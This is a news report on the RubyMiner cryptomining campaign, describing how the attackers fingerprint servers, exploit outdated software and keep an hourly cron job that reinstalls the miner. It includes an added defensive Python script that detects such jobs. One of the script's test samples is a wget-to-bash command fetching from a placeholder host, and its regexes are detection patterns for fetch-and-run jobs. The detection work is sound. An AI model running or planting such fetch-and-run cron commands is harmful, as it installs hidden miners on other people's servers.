Security researchers at Check Point, Ixia, and Certegy have found that more than 700 Windows and Linux servers are infected with the RubyMiner malware, which is used for covert cryptocurrency mining. The first attacks were noticed last week, but the campaign became widespread only a few days ago.
Nevertheless, the researchers are confident that the hackers have only just begun large-scale operations, which means many more servers may be attacked in the future.
Because the miner runs on both Windows and Linux servers, the hackers use the p0f utility to determine the type of server software. If the software is outdated, the attackers launch exploits that infect the server with a malicious miner, which mines cryptocurrency using other people's computing resources without the owners' knowledge.
On Linux, the exploit code erases all scheduled tasks and sets a new one: every hour, a script is downloaded to the server from a specified resource and installs the mining software. In some cases, PyCryptoMiner is installed on the server after the attack. Attackers sometimes also target Oracle WebLogic servers to mine cryptocurrency.
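A defender can check for the persistence pattern described above by auditing crontabs for an hourly job that downloads a script and runs it, especially when it is the only job left. The following is an added example, not code from the article or the researchers; it assumes the "tasks" are cron jobs and that the download is piped to an interpreter, and the sample crontabs and host names are constructed placeholders.

```python
import re

# Assumption: the job fetches with wget/curl and pipes the result to an interpreter.
FETCH = re.compile(r"\b(?:wget|curl)\b")
PIPE_TO_INTERPRETER = re.compile(
    r"\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b|\|\s*(?:python|perl|ruby)\d*\b")

def parse_jobs(crontab_text):
    """Return (schedule, command) per job; skip blanks, comments and VAR=value lines."""
    jobs = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*\s*=", line):
            continue
        if line.startswith("@"):              # macro schedules such as @hourly
            parts = line.split(None, 1)
            if len(parts) == 2:
                jobs.append((parts[0], parts[1]))
            continue
        parts = line.split(None, 5)           # five time fields, then the command
        if len(parts) == 6:
            jobs.append((" ".join(parts[:5]), parts[5]))
    return jobs

def is_hourly(schedule):
    """True for @hourly, or a fixed minute with '*' in the other four fields."""
    if schedule == "@hourly":
        return True
    fields = schedule.split()
    return len(fields) == 5 and fields[0].isdigit() and fields[1:] == ["*"] * 4

def audit(crontab_text):
    """Flag hourly fetch-and-run jobs; sole_job marks a crontab reduced to that one job."""
    jobs = parse_jobs(crontab_text)
    return [{"schedule": s, "command": c, "sole_job": len(jobs) == 1}
            for s, c in jobs
            if is_hourly(s) and FETCH.search(c) and PIPE_TO_INTERPRETER.search(c)]

# Constructed samples; the hosts are placeholders, not indicators from the report.
WIPED = ("1 * * * * wget -q -O - http://downloader.example.invalid/task.txt"
         " | bash > /dev/null 2>&1\n")
NORMAL = ("MAILTO=root\n# nightly backup\n30 2 * * * /usr/local/bin/backup.sh\n"
          "@hourly /usr/bin/curl -fsS https://status.example.invalid/ping\n")

if __name__ == "__main__":
    for name, text in (("wiped", WIPED), ("normal", NORMAL)):
        print(name, audit(text))
```

Run `audit()` over the output of `crontab -l` for each account and over the files in `/etc/cron.d`; a finding with `sole_job` set is the strongest match for the wipe-and-replace behaviour.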
So far the scale is small: the wallets connected to RubyMiner contain only 540 dollars' worth of cryptocurrency, but the hackers attacking WebLogic servers could mine several hundred thousand dollars over several months.